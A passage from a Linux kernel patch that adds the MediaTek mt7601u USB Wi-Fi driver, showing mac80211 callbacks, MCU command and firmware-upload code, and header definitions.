= idx; + } else { + if (idx == wcid->hw_key_idx) + wcid->hw_key_idx = -1; + + key = NULL; + } + + if (!msta) { + if (key || wcid->hw_key_idx == idx) { + ret = mt76_mac_wcid_set_key(dev, wcid->idx, key); + if (ret) + return ret; + } + + return mt76_mac_shared_key_setup(dev, mvif->idx, idx, key); + } + + return mt76_mac_wcid_set_key(dev, msta->wcid.idx, key); +} + +static int mt7601u_set_rts_threshold(struct ieee80211_hw *hw, u32 value) +{ + struct mt7601u_dev *dev = hw->priv; + + mt76_rmw_field(dev, MT_TX_RTS_CFG, MT_TX_RTS_CFG_THRESH, value); + + return 0; +} + +static int +mt76_ampdu_action(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + enum ieee80211_ampdu_mlme_action action, + struct ieee80211_sta *sta, u16 tid, u16 *ssn, u8 buf_size) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_sta *msta = (struct mt76_sta *) sta->drv_priv; + + WARN_ON(msta->wcid.idx > GROUP_WCID(0)); + + switch (action) { + case IEEE80211_AMPDU_RX_START: + mt76_set(dev, MT_WCID_ADDR(msta->wcid.idx) + 4, BIT(16 + tid)); + break; + case IEEE80211_AMPDU_RX_STOP: + mt76_clear(dev, MT_WCID_ADDR(msta->wcid.idx) + 4, + BIT(16 + tid)); + break; + case IEEE80211_AMPDU_TX_OPERATIONAL: + ieee80211_send_bar(vif, sta->addr, tid, msta->agg_ssn[tid]); + break; + case IEEE80211_AMPDU_TX_STOP_FLUSH: + case IEEE80211_AMPDU_TX_STOP_FLUSH_CONT: + break; + case IEEE80211_AMPDU_TX_START: + msta->agg_ssn[tid] = *ssn << 4; + ieee80211_start_tx_ba_cb_irqsafe(vif, sta->addr, tid); + break; + case IEEE80211_AMPDU_TX_STOP_CONT: + ieee80211_stop_tx_ba_cb_irqsafe(vif, sta->addr, tid); + break; + } + + return 0; +} + +static void +mt76_sta_rate_tbl_update(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + struct ieee80211_sta *sta) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_sta *msta = (struct mt76_sta *) sta->drv_priv; + struct ieee80211_sta_rates *rates; + struct ieee80211_tx_rate rate = {}; + + rcu_read_lock(); + rates = rcu_dereference(sta->rates); + + if (!rates) + goto out; + + rate.idx = rates->rate[0].idx; + rate.flags = rates->rate[0].flags; + mt76_mac_wcid_set_rate(dev, &msta->wcid, &rate); + +out: + rcu_read_unlock(); +} + +const struct ieee80211_ops mt7601u_ops = { + .tx = mt7601u_tx, + .start = mt7601u_start, + .stop = mt7601u_stop, + .add_interface = mt7601u_add_interface, + .remove_interface = mt7601u_remove_interface, + .config = mt7601u_config, + .configure_filter = mt76_configure_filter, + .bss_info_changed = mt7601u_bss_info_changed, + .sta_add = mt7601u_sta_add, + .sta_remove = mt7601u_sta_remove, + .sta_notify = mt7601u_sta_notify, + .set_key = mt7601u_set_key, + .conf_tx = mt7601u_conf_tx, + .sw_scan_start = mt7601u_sw_scan, + .sw_scan_complete = mt7601u_sw_scan_complete, + .ampdu_action = mt76_ampdu_action, + .sta_rate_tbl_update = mt76_sta_rate_tbl_update, + .set_rts_threshold = mt7601u_set_rts_threshold, +}; diff --git a/drivers/net/wireless/mediatek/mt7601u/mcu.c b/drivers/net/wireless/mediatek/mt7601u/mcu.c new file mode 100644 index 000000000000..fbb1986eda3c --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/mcu.c @@ -0,0 +1,534 @@ +/* + * (c) Copyright 2002-2010, Ralink Technology, Inc. + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include +#include +#include +#include +#include + +#include "mt7601u.h" +#include "dma.h" +#include "mcu.h" +#include "usb.h" +#include "trace.h" + +#define MCU_FW_URB_MAX_PAYLOAD 0x3800 +#define MCU_FW_URB_SIZE (MCU_FW_URB_MAX_PAYLOAD + 12) +#define MCU_RESP_URB_SIZE 1024 + +static inline int firmware_running(struct mt7601u_dev *dev) +{ + return mt7601u_rr(dev, MT_MCU_COM_REG0) == 1; +} + +static inline void skb_put_le32(struct sk_buff *skb, u32 val) +{ + put_unaligned_le32(val, skb_put(skb, 4)); +} + +static inline void mt7601u_dma_skb_wrap_cmd(struct sk_buff *skb, + u8 seq, enum mcu_cmd cmd) +{ + WARN_ON(mt7601u_dma_skb_wrap(skb, CPU_TX_PORT, DMA_COMMAND, + MT76_SET(MT_TXD_CMD_INFO_SEQ, seq) | + MT76_SET(MT_TXD_CMD_INFO_TYPE, cmd))); +} + +static inline void trace_mt_mcu_msg_send_cs(struct mt7601u_dev *dev, + struct sk_buff *skb, bool need_resp) +{ + u32 i, csum = 0; + + for (i = 0; i < skb->len / 4; i++) + csum ^= get_unaligned_le32(skb->data + i * 4); + + trace_mt_mcu_msg_send(dev, skb, csum, need_resp); +} + +static struct sk_buff * +mt7601u_mcu_msg_alloc(struct mt7601u_dev *dev, const void *data, int len) +{ + struct sk_buff *skb; + + WARN_ON(len % 4); /* if length is not divisible by 4 we need to pad */ + + skb = alloc_skb(len + MT_DMA_HDR_LEN + 4, GFP_KERNEL); + skb_reserve(skb, MT_DMA_HDR_LEN); + memcpy(skb_put(skb, len), data, len); + + return skb; +} + +static int mt7601u_mcu_wait_resp(struct mt7601u_dev *dev, u8 seq) +{ + struct urb *urb = dev->mcu.resp.urb; + u32 rxfce; + int urb_status, ret, i = 5; + + while (i--) { + if (!wait_for_completion_timeout(&dev->mcu.resp_cmpl, + msecs_to_jiffies(300))) { + dev_warn(dev->dev, "Warning: %s retrying\n", __func__); + continue; + } + + /* Make copies of important data before reusing the urb */ + rxfce = get_unaligned_le32(dev->mcu.resp.buf); + urb_status = urb->status * mt7601u_urb_has_error(urb); + + ret = mt7601u_usb_submit_buf(dev, USB_DIR_IN, MT_EP_IN_CMD_RESP, + &dev->mcu.resp, GFP_KERNEL, + mt7601u_complete_urb, + &dev->mcu.resp_cmpl); + if (ret) + return ret; + + if (urb_status) + dev_err(dev->dev, "Error: MCU resp urb failed:%d\n", + urb_status); + + if (MT76_GET(MT_RXD_CMD_INFO_CMD_SEQ, rxfce) == seq && + MT76_GET(MT_RXD_CMD_INFO_EVT_TYPE, rxfce) == CMD_DONE) + return 0; + + dev_err(dev->dev, "Error: MCU resp evt:%hhx seq:%hhx-%hhx!\n", + MT76_GET(MT_RXD_CMD_INFO_EVT_TYPE, rxfce), + seq, MT76_GET(MT_RXD_CMD_INFO_CMD_SEQ, rxfce)); + } + + dev_err(dev->dev, "Error: %s timed out\n", __func__); + return -ETIMEDOUT; +} + +static int +mt7601u_mcu_msg_send(struct mt7601u_dev *dev, struct sk_buff *skb, + enum mcu_cmd cmd, bool wait_resp) +{ + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + unsigned cmd_pipe = usb_sndbulkpipe(usb_dev, + dev->out_eps[MT_EP_OUT_INBAND_CMD]); + int sent, ret; + u8 seq = 0; + + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return 0; + + mutex_lock(&dev->mcu.mutex); + + if (wait_resp) + while (!seq) + seq = ++dev->mcu.msg_seq & 0xf; + + mt7601u_dma_skb_wrap_cmd(skb, seq, cmd); + + if (dev->mcu.resp_cmpl.done) + dev_err(dev->dev, "Error: MCU response pre-completed!\n"); + + trace_mt_mcu_msg_send_cs(dev, skb, wait_resp); + trace_mt_submit_urb_sync(dev, cmd_pipe, skb->len); + ret = usb_bulk_msg(usb_dev, cmd_pipe, skb->data, skb->len, &sent, 500); + if (ret) { + dev_err(dev->dev, "Error: send MCU cmd failed:%d\n", ret); + goto out; + } + if (sent != skb->len) + dev_err(dev->dev, "Error: %s sent != skb->len\n", __func__); + + if (wait_resp) + ret = mt7601u_mcu_wait_resp(dev, seq); +out: + mutex_unlock(&dev->mcu.mutex); + + consume_skb(skb); + + return ret; +} + +static int mt7601u_mcu_function_select(struct mt7601u_dev *dev, + enum mcu_function func, u32 val) +{ + struct sk_buff *skb; + struct { + __le32 id; + __le32 value; + } __packed __aligned(4) msg = { + .id = cpu_to_le32(func), + .value = cpu_to_le32(val), + }; + + skb = mt7601u_mcu_msg_alloc(dev, &msg, sizeof(msg)); + return mt7601u_mcu_msg_send(dev, skb, CMD_FUN_SET_OP, func == 5); +} + +int mt7601u_mcu_tssi_read_kick(struct mt7601u_dev *dev, int use_hvga) +{ + int ret; + + if (!test_bit(MT7601U_STATE_MCU_RUNNING, &dev->state)) + return 0; + + ret = mt7601u_mcu_function_select(dev, ATOMIC_TSSI_SETTING, + use_hvga); + if (ret) { + dev_warn(dev->dev, "Warning: MCU TSSI read kick failed\n"); + return ret; + } + + dev->tssi_read_trig = true; + + return 0; +} + +int +mt7601u_mcu_calibrate(struct mt7601u_dev *dev, enum mcu_calibrate cal, u32 val) +{ + struct sk_buff *skb; + struct { + __le32 id; + __le32 value; + } __packed __aligned(4) msg = { + .id = cpu_to_le32(cal), + .value = cpu_to_le32(val), + }; + + skb = mt7601u_mcu_msg_alloc(dev, &msg, sizeof(msg)); + return mt7601u_mcu_msg_send(dev, skb, CMD_CALIBRATION_OP, true); +} + +int mt7601u_write_reg_pairs(struct mt7601u_dev *dev, u32 base, + const struct mt76_reg_pair *data, int n) +{ + const int max_vals_per_cmd = INBAND_PACKET_MAX_LEN / 8; + struct sk_buff *skb; + int cnt, i, ret; + + if (!n) + return 0; + + cnt = min(max_vals_per_cmd, n); + + skb = alloc_skb(cnt * 8 + MT_DMA_HDR_LEN + 4, GFP_KERNEL); + if (!skb) + return -ENOMEM; + skb_reserve(skb, MT_DMA_HDR_LEN); + + for (i = 0; i < cnt; i++) { + skb_put_le32(skb, base + data[i].reg); + skb_put_le32(skb, data[i].value); + } + + ret = mt7601u_mcu_msg_send(dev, skb, CMD_RANDOM_WRITE, cnt == n); + if (ret) + return ret; + + return mt7601u_write_reg_pairs(dev, base, data + cnt, n - cnt); +} + +int mt7601u_burst_write_regs(struct mt7601u_dev *dev, u32 offset, + const u32 *data, int n) +{ + const int max_regs_per_cmd = INBAND_PACKET_MAX_LEN / 4 - 1; + struct sk_buff *skb; + int cnt, i, ret; + + if (!n) + return 0; + + cnt = min(max_regs_per_cmd, n); + + skb = alloc_skb(cnt * 4 + MT_DMA_HDR_LEN + 4, GFP_KERNEL); + if (!skb) + return -ENOMEM; + skb_reserve(skb, MT_DMA_HDR_LEN); + + skb_put_le32(skb, MT_MCU_MEMMAP_WLAN + offset); + for (i = 0; i < cnt; i++) + skb_put_le32(skb, data[i]); + + ret = mt7601u_mcu_msg_send(dev, skb, CMD_BURST_WRITE, cnt == n); + if (ret) + return ret; + + return mt7601u_burst_write_regs(dev, offset + cnt * 4, + data + cnt, n - cnt); +} + +struct mt76_fw_header { + __le32 ilm_len; + __le32 dlm_len; + __le16 build_ver; + __le16 fw_ver; + u8 pad[4]; + char build_time[16]; +}; + +struct mt76_fw { + struct mt76_fw_header hdr; + u8 ivb[MT_MCU_IVB_SIZE]; + u8 ilm[]; +}; + +static int __mt7601u_dma_fw(struct mt7601u_dev *dev, + const struct mt7601u_dma_buf *dma_buf, + const void *data, u32 len, u32 dst_addr) +{ + DECLARE_COMPLETION_ONSTACK(cmpl); + struct mt7601u_dma_buf buf = *dma_buf; /* we need to fake length */ + __le32 reg; + u32 val; + int ret; + + reg = cpu_to_le32(MT76_SET(MT_TXD_INFO_TYPE, DMA_PACKET) | + MT76_SET(MT_TXD_INFO_D_PORT, CPU_TX_PORT) | + MT76_SET(MT_TXD_INFO_LEN, len)); + memcpy(buf.buf, ®, sizeof(reg)); + memcpy(buf.buf + sizeof(reg), data, len); + memset(buf.buf + sizeof(reg) + len, 0, 8); + + ret = mt7601u_vendor_single_wr(dev, MT_VEND_WRITE_FCE, + MT_FCE_DMA_ADDR, dst_addr); + if (ret) + return ret; + len = roundup(len, 4); + ret = mt7601u_vendor_single_wr(dev, MT_VEND_WRITE_FCE, + MT_FCE_DMA_LEN, len << 16); + if (ret) + return ret; + + buf.len = MT_DMA_HDR_LEN + len + 4; + ret = mt7601u_usb_submit_buf(dev, USB_DIR_OUT, MT_EP_OUT_INBAND_CMD, + &buf, GFP_KERNEL, + mt7601u_complete_urb, &cmpl); + if (ret) + return ret; + + if (!wait_for_completion_timeout(&cmpl, msecs_to_jiffies(1000))) { + dev_err(dev->dev, "Error: firmware upload timed out\n"); + usb_kill_urb(buf.urb); + return -ETIMEDOUT; + } + if (mt7601u_urb_has_error(buf.urb)) { + dev_err(dev->dev, "Error: firmware upload urb failed:%d\n", + buf.urb->status); + return buf.urb->status; + } + + val = mt7601u_rr(dev, MT_TX_CPU_FROM_FCE_CPU_DESC_IDX); + val++; + mt7601u_wr(dev, MT_TX_CPU_FROM_FCE_CPU_DESC_IDX, val); + + return 0; +} + +static int +mt7601u_dma_fw(struct mt7601u_dev *dev, struct mt7601u_dma_buf *dma_buf, + const void *data, int len, u32 dst_addr) +{ + int n, ret; + + if (len == 0) + return 0; + + n = min(MCU_FW_URB_MAX_PAYLOAD, len); + ret = __mt7601u_dma_fw(dev, dma_buf, data, n, dst_addr); + if (ret) + return ret; + + if (!mt76_poll_msec(dev, MT_MCU_COM_REG1, BIT(31), BIT(31), 500)) + return -ETIMEDOUT; + + return mt7601u_dma_fw(dev, dma_buf, data + n, len - n, dst_addr + n); +} + +static int +mt7601u_upload_firmware(struct mt7601u_dev *dev, const struct mt76_fw *fw) +{ + struct mt7601u_dma_buf dma_buf; + void *ivb; + u32 ilm_len, dlm_len; + int i, ret; + + ivb = kmemdup(fw->ivb, sizeof(fw->ivb), GFP_KERNEL); + if (!ivb || mt7601u_usb_alloc_buf(dev, MCU_FW_URB_SIZE, &dma_buf)) { + ret = -ENOMEM; + goto error; + } + + ilm_len = le32_to_cpu(fw->hdr.ilm_len) - sizeof(fw->ivb); + dev_dbg(dev->dev, "loading FW - ILM %u + IVB %zu\n", + ilm_len, sizeof(fw->ivb)); + ret = mt7601u_dma_fw(dev, &dma_buf, fw->ilm, ilm_len, sizeof(fw->ivb)); + if (ret) + goto error; + + dlm_len = le32_to_cpu(fw->hdr.dlm_len); + dev_dbg(dev->dev, "loading FW - DLM %u\n", dlm_len); + ret = mt7601u_dma_fw(dev, &dma_buf, fw->ilm + ilm_len, + dlm_len, MT_MCU_DLM_OFFSET); + if (ret) + goto error; + + ret = mt7601u_vendor_request(dev, MT_VEND_DEV_MODE, USB_DIR_OUT, + 0x12, 0, ivb, sizeof(fw->ivb)); + if (ret < 0) + goto error; + ret = 0; + + for (i = 100; i && !firmware_running(dev); i--) + msleep(10); + if (!i) { + ret = -ETIMEDOUT; + goto error; + } + + dev_dbg(dev->dev, "Firmware running!\n"); +error: + kfree(ivb); + mt7601u_usb_free_buf(dev, &dma_buf); + + return ret; +} + +static int mt7601u_load_firmware(struct mt7601u_dev *dev) +{ + const struct firmware *fw; + const struct mt76_fw_header *hdr; + int len, ret; + u32 val; + + mt7601u_wr(dev, MT_USB_DMA_CFG, (MT_USB_DMA_CFG_RX_BULK_EN | + MT_USB_DMA_CFG_TX_BULK_EN)); + + if (firmware_running(dev)) + return 0; + + ret = request_firmware(&fw, MT7601U_FIRMWARE, dev->dev); + if (ret) + return ret; + + if (!fw || !fw->data || fw->size < sizeof(*hdr)) + goto err_inv_fw; + + hdr = (const struct mt76_fw_header *) fw->data; + + if (le32_to_cpu(hdr->ilm_len) <= MT_MCU_IVB_SIZE) + goto err_inv_fw; + + len = sizeof(*hdr); + len += le32_to_cpu(hdr->ilm_len); + len += le32_to_cpu(hdr->dlm_len); + + if (fw->size != len) + goto err_inv_fw; + + val = le16_to_cpu(hdr->fw_ver); + dev_info(dev->dev, + "Firmware Version: %d.%d.%02d Build: %x Build time: %.16s\n", + (val >> 12) & 0xf, (val >> 8) & 0xf, val & 0xf, + le16_to_cpu(hdr->build_ver), hdr->build_time); + + len = le32_to_cpu(hdr->ilm_len); + + mt7601u_wr(dev, 0x94c, 0); + mt7601u_wr(dev, MT_FCE_PSE_CTRL, 0); + + mt7601u_vendor_reset(dev); + msleep(5); + + mt7601u_wr(dev, 0xa44, 0); + mt7601u_wr(dev, 0x230, 0x84210); + mt7601u_wr(dev, 0x400, 0x80c00); + mt7601u_wr(dev, 0x800, 1); + + mt7601u_rmw(dev, MT_PBF_CFG, 0, (MT_PBF_CFG_TX0Q_EN | + MT_PBF_CFG_TX1Q_EN | + MT_PBF_CFG_TX2Q_EN | + MT_PBF_CFG_TX3Q_EN)); + + mt7601u_wr(dev, MT_FCE_PSE_CTRL, 1); + + mt7601u_wr(dev, MT_USB_DMA_CFG, (MT_USB_DMA_CFG_RX_BULK_EN | + MT_USB_DMA_CFG_TX_BULK_EN)); + val = mt76_set(dev, MT_USB_DMA_CFG, MT_USB_DMA_CFG_TX_CLR); + val &= ~MT_USB_DMA_CFG_TX_CLR; + mt7601u_wr(dev, MT_USB_DMA_CFG, val); + + /* FCE tx_fs_base_ptr */ + mt7601u_wr(dev, MT_TX_CPU_FROM_FCE_BASE_PTR, 0x400230); + /* FCE tx_fs_max_cnt */ + mt7601u_wr(dev, MT_TX_CPU_FROM_FCE_MAX_COUNT, 1); + /* FCE pdma enable */ + mt7601u_wr(dev, MT_FCE_PDMA_GLOBAL_CONF, 0x44); + /* FCE skip_fs_en */ + mt7601u_wr(dev, MT_FCE_SKIP_FS, 3); + + ret = mt7601u_upload_firmware(dev, (const struct mt76_fw *)fw->data); + + release_firmware(fw); + + return ret; + +err_inv_fw: + dev_err(dev->dev, "Invalid firmware image\n"); + release_firmware(fw); + return -ENOENT; +} + +int mt7601u_mcu_init(struct mt7601u_dev *dev) +{ + int ret; + + mutex_init(&dev->mcu.mutex); + + ret = mt7601u_load_firmware(dev); + if (ret) + return ret; + + set_bit(MT7601U_STATE_MCU_RUNNING, &dev->state); + + return 0; +} + +int mt7601u_mcu_cmd_init(struct mt7601u_dev *dev) +{ + int ret; + + ret = mt7601u_mcu_function_select(dev, Q_SELECT, 1); + if (ret) + return ret; + + init_completion(&dev->mcu.resp_cmpl); + if (mt7601u_usb_alloc_buf(dev, MCU_RESP_URB_SIZE, &dev->mcu.resp)) { + mt7601u_usb_free_buf(dev, &dev->mcu.resp); + return -ENOMEM; + } + + ret = mt7601u_usb_submit_buf(dev, USB_DIR_IN, MT_EP_IN_CMD_RESP, + &dev->mcu.resp, GFP_KERNEL, + mt7601u_complete_urb, &dev->mcu.resp_cmpl); + if (ret) { + mt7601u_usb_free_buf(dev, &dev->mcu.resp); + return ret; + } + + return 0; +} + +void mt7601u_mcu_cmd_deinit(struct mt7601u_dev *dev) +{ + usb_kill_urb(dev->mcu.resp.urb); + mt7601u_usb_free_buf(dev, &dev->mcu.resp); +} diff --git a/drivers/net/wireless/mediatek/mt7601u/mcu.h b/drivers/net/wireless/mediatek/mt7601u/mcu.h new file mode 100644 index 000000000000..4a66d1092a18 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/mcu.h @@ -0,0 +1,94 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT7601U_MCU_H +#define __MT7601U_MCU_H + +struct mt7601u_dev; + +/* Register definitions */ +#define MT_MCU_RESET_CTL 0x070C +#define MT_MCU_INT_LEVEL 0x0718 +#define MT_MCU_COM_REG0 0x0730 +#define MT_MCU_COM_REG1 0x0734 +#define MT_MCU_COM_REG2 0x0738 +#define MT_MCU_COM_REG3 0x073C + +#define MT_MCU_IVB_SIZE 0x40 +#define MT_MCU_DLM_OFFSET 0x80000 + +#define MT_MCU_MEMMAP_WLAN 0x00410000 +#define MT_MCU_MEMMAP_BBP 0x40000000 +#define MT_MCU_MEMMAP_RF 0x80000000 + +#define INBAND_PACKET_MAX_LEN 192 + +enum mcu_cmd { + CMD_FUN_SET_OP = 1, + CMD_LOAD_CR = 2, + CMD_INIT_GAIN_OP = 3, + CMD_DYNC_VGA_OP = 6, + CMD_TDLS_CH_SW = 7, + CMD_BURST_WRITE = 8, + CMD_READ_MODIFY_WRITE = 9, + CMD_RANDOM_READ = 10, + CMD_BURST_READ = 11, + CMD_RANDOM_WRITE = 12, + CMD_LED_MODE_OP = 16, + CMD_POWER_SAVING_OP = 20, + CMD_WOW_CONFIG = 21, + CMD_WOW_QUERY = 22, + CMD_WOW_FEATURE = 24, + CMD_CARRIER_DETECT_OP = 28, + CMD_RADOR_DETECT_OP = 29, + CMD_SWITCH_CHANNEL_OP = 30, + CMD_CALIBRATION_OP = 31, + CMD_BEACON_OP = 32, + CMD_ANTENNA_OP = 33, +}; + +enum mcu_function { + Q_SELECT = 1, + ATOMIC_TSSI_SETTING = 5, +}; + +enum mcu_power_mode { + RADIO_OFF = 0x30, + RADIO_ON = 0x31, + RADIO_OFF_AUTO_WAKEUP = 0x32, + RADIO_OFF_ADVANCE = 0x33, + RADIO_ON_ADVANCE = 0x34, +}; + +enum mcu_calibrate { + MCU_CAL_R = 1, + MCU_CAL_DCOC, + MCU_CAL_LC, + MCU_CAL_LOFT, + MCU_CAL_TXIQ, + MCU_CAL_BW, + MCU_CAL_DPD, + MCU_CAL_RXIQ, + MCU_CAL_TXDCOC, +}; + +int mt7601u_mcu_init(struct mt7601u_dev *dev); +int mt7601u_mcu_cmd_init(struct mt7601u_dev *dev); +void mt7601u_mcu_cmd_deinit(struct mt7601u_dev *dev); + +int +mt7601u_mcu_calibrate(struct mt7601u_dev *dev, enum mcu_calibrate cal, u32 val); +int mt7601u_mcu_tssi_read_kick(struct mt7601u_dev *dev, int use_hvga); + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/mt7601u.h b/drivers/net/wireless/mediatek/mt7601u/mt7601u.h new file mode 100644 index 000000000000..9102be6b95cb --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/mt7601u.h @@ -0,0 +1,390 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef MT7601U_H +#define MT7601U_H + +#include +#include +#include +#include +#include +#include +#include + +#include "regs.h" +#include "util.h" + +#define MT_CALIBRATE_INTERVAL (4 * HZ) + +#define MT_FREQ_CAL_INIT_DELAY (30 * HZ) +#define MT_FREQ_CAL_CHECK_INTERVAL (10 * HZ) +#define MT_FREQ_CAL_ADJ_INTERVAL (HZ / 2) + +#define MT_BBP_REG_VERSION 0x00 + +#define MT_USB_AGGR_SIZE_LIMIT 28 /* * 1024B */ +#define MT_USB_AGGR_TIMEOUT 0x80 /* * 33ns */ +#define MT_RX_ORDER 3 +#define MT_RX_URB_SIZE (PAGE_SIZE << MT_RX_ORDER) + +struct mt7601u_dma_buf { + struct urb *urb; + void *buf; + dma_addr_t dma; + size_t len; +}; + +struct mt7601u_mcu { + struct mutex mutex; + + u8 msg_seq; + + struct mt7601u_dma_buf resp; + struct completion resp_cmpl; +}; + +struct mt7601u_freq_cal { + struct delayed_work work; + u8 freq; + bool enabled; + bool adjusting; +}; + +struct mac_stats { + u64 rx_stat[6]; + u64 tx_stat[6]; + u64 aggr_stat[2]; + u64 aggr_n[32]; + u64 zero_len_del[2]; +}; + +#define N_RX_ENTRIES 16 +struct mt7601u_rx_queue { + struct mt7601u_dev *dev; + + struct mt7601u_dma_buf_rx { + struct urb *urb; + struct page *p; + } e[N_RX_ENTRIES]; + + unsigned int start; + unsigned int end; + unsigned int entries; + unsigned int pending; +}; + +#define N_TX_ENTRIES 64 + +struct mt7601u_tx_queue { + struct mt7601u_dev *dev; + + struct mt7601u_dma_buf_tx { + struct urb *urb; + struct sk_buff *skb; + } e[N_TX_ENTRIES]; + + unsigned int start; + unsigned int end; + unsigned int entries; + unsigned int used; + unsigned int fifo_seq; +}; + +/* WCID allocation: + * 0: mcast wcid + * 1: bssid wcid + * 1...: STAs + * ...7e: group wcids + * 7f: reserved + */ +#define N_WCIDS 128 +#define GROUP_WCID(idx) (N_WCIDS - 2 - idx) + +struct mt7601u_eeprom_params; + +#define MT_EE_TEMPERATURE_SLOPE 39 +#define MT_FREQ_OFFSET_INVALID -128 + +enum mt_temp_mode { + MT_TEMP_MODE_NORMAL, + MT_TEMP_MODE_HIGH, + MT_TEMP_MODE_LOW, +}; + +enum mt_bw { + MT_BW_20, + MT_BW_40, +}; + +enum { + MT7601U_STATE_INITIALIZED, + MT7601U_STATE_REMOVED, + MT7601U_STATE_WLAN_RUNNING, + MT7601U_STATE_MCU_RUNNING, + MT7601U_STATE_SCANNING, + MT7601U_STATE_READING_STATS, + MT7601U_STATE_MORE_STATS, +}; + +/** + * struct mt7601u_dev - adapter structure + * @lock: protects @wcid->tx_rate. + * @tx_lock: protects @tx_q and changes of MT7601U_STATE_*_STATS + flags in @state. + * @rx_lock: protects @rx_q. + * @con_mon_lock: protects @ap_bssid, @bcn_*, @avg_rssi. + * @mutex: ensures exclusive access from mac80211 callbacks. + * @vendor_req_mutex: ensures atomicity of vendor requests. + * @reg_atomic_mutex: ensures atomicity of indirect register accesses + * (accesses to RF and BBP). + * @hw_atomic_mutex: ensures exclusive access to HW during critical + * operations (power management, channel switch). + */ +struct mt7601u_dev { + struct ieee80211_hw *hw; + struct device *dev; + + unsigned long state; + + struct mutex mutex; + + unsigned long wcid_mask[N_WCIDS / BITS_PER_LONG]; + + struct cfg80211_chan_def chandef; + struct ieee80211_supported_band *sband_2g; + + struct mt7601u_mcu mcu; + + struct delayed_work cal_work; + struct delayed_work mac_work; + + struct workqueue_struct *stat_wq; + struct delayed_work stat_work; + + struct mt76_wcid *mon_wcid; + struct mt76_wcid __rcu *wcid[N_WCIDS]; + + spinlock_t lock; + + const u16 *beacon_offsets; + + u8 macaddr[ETH_ALEN]; + struct mt7601u_eeprom_params *ee; + + struct mutex vendor_req_mutex; + struct mutex reg_atomic_mutex; + struct mutex hw_atomic_mutex; + + u32 rxfilter; + u32 debugfs_reg; + + u8 out_eps[8]; + u8 in_eps[8]; + u16 out_max_packet; + u16 in_max_packet; + + /* TX */ + spinlock_t tx_lock; + struct mt7601u_tx_queue *tx_q; + + atomic_t avg_ampdu_len; + + /* RX */ + spinlock_t rx_lock; + struct tasklet_struct rx_tasklet; + struct mt7601u_rx_queue rx_q; + + /* Connection monitoring things */ + spinlock_t con_mon_lock; + u8 ap_bssid[ETH_ALEN]; + + s8 bcn_freq_off; + u8 bcn_phy_mode; + + int avg_rssi; /* starts at 0 and converges */ + + u8 agc_save; + + struct mt7601u_freq_cal freq_cal; + + bool tssi_read_trig; + + s8 tssi_init; + s8 tssi_init_hvga; + s16 tssi_init_hvga_offset_db; + + int prev_pwr_diff; + + enum mt_temp_mode temp_mode; + int curr_temp; + int dpd_temp; + s8 raw_temp; + bool pll_lock_protect; + + u8 bw; + bool chan_ext_below; + + /* PA mode */ + u32 rf_pa_mode[2]; + + struct mac_stats stats; +}; + +struct mt7601u_tssi_params { + char tssi0; + int trgt_power; +}; + +struct mt76_wcid { + u8 idx; + u8 hw_key_idx; + + u16 tx_rate; + bool tx_rate_set; + u8 tx_rate_nss; +}; + +struct mt76_vif { + u8 idx; + + struct mt76_wcid group_wcid; +}; + +struct mt76_sta { + struct mt76_wcid wcid; + u16 agg_ssn[IEEE80211_NUM_TIDS]; +}; + +struct mt76_reg_pair { + u32 reg; + u32 value; +}; + +struct mt7601u_rxwi; + +extern const struct ieee80211_ops mt7601u_ops; + +void mt7601u_init_debugfs(struct mt7601u_dev *dev); + +u32 mt7601u_rr(struct mt7601u_dev *dev, u32 offset); +void mt7601u_wr(struct mt7601u_dev *dev, u32 offset, u32 val); +u32 mt7601u_rmw(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val); +u32 mt7601u_rmc(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val); +void mt7601u_wr_copy(struct mt7601u_dev *dev, u32 offset, + const void *data, int len); + +int mt7601u_wait_asic_ready(struct mt7601u_dev *dev); +bool mt76_poll(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val, + int timeout); +bool mt76_poll_msec(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val, + int timeout); + +/* Compatibility with mt76 */ +#define mt76_rmw_field(_dev, _reg, _field, _val) \ + mt76_rmw(_dev, _reg, _field, MT76_SET(_field, _val)) + +static inline u32 mt76_rr(struct mt7601u_dev *dev, u32 offset) +{ + return mt7601u_rr(dev, offset); +} + +static inline void mt76_wr(struct mt7601u_dev *dev, u32 offset, u32 val) +{ + return mt7601u_wr(dev, offset, val); +} + +static inline u32 +mt76_rmw(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val) +{ + return mt7601u_rmw(dev, offset, mask, val); +} + +static inline u32 mt76_set(struct mt7601u_dev *dev, u32 offset, u32 val) +{ + return mt76_rmw(dev, offset, 0, val); +} + +static inline u32 mt76_clear(struct mt7601u_dev *dev, u32 offset, u32 val) +{ + return mt76_rmw(dev, offset, val, 